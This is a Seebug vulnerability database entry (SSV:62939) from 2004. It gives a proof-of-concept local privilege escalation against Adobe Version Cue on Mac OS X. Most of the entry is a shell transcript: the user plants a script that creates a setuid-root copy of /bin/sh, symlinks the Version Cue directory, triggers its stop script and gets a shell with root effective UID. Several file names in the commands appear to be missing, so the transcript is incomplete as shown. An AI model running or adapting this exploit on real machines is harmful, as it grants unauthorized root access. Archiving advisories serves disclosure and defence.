Mac OS X Adobe Version Cue - Local Root Exploit

ID SSV:62939
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.

                                                Proof of concept:

haven:~ fintler$ cd ~
haven:~ fintler$ id
uid=502(fintler) gid=500(fintler) groups=500(fintler)
haven:~ fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755
/Users/$USER/sh;chown root /Users/$USER/sh" >
haven:~ fintler$ chmod 0755 ./
haven:~ fintler$ ln -s /Applications/Adobe\ Version\ Cue/ .
haven:~ fintler$ ./
Stopping  ...

./ line 21: ./tomcat/bin/ No such file or directory
No matching processes belonging to you were found
haven:~ fintler$ ./sh
sh-2.05b# id
uid=502(fintler) euid=0(root) gid=500(fintler) groups=500(fintler)
sh-2.05b# whoami

# [2004-12-08]